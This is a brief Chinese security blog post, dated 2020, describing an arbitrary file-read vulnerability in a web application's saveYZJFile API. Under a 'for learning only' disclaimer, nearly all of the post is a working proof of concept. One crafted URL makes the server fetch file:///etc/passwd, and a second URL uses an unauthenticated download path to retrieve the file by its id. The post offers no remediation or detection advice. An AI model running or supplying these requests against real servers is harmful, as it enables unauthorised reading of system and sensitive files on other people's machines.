论安全萌新的自我修养

   :: 首页  :: 新随笔  :: 联系 :: 订阅 订阅  :: 管理

请遵守网络安全法!!!本文仅供学习交流使用!用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关!读者自行承担其恶果!

主要成因

/wxjsapi/saveYZJFil接口获取filepath,返回数据包内出现了程序的绝对路径,攻击者可以此下载相关敏感文件

构造如下语句

http://x.x.x.x/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt

获取id值如下

通过id值获取文件内容

http://x.x.x.x/file/fileNoLogin/xxxxxxxxxxxxxxxddfc7e

posted on 2020-09-12 17:40  Yangsir34  阅读(1766)  评论(0编辑  收藏  举报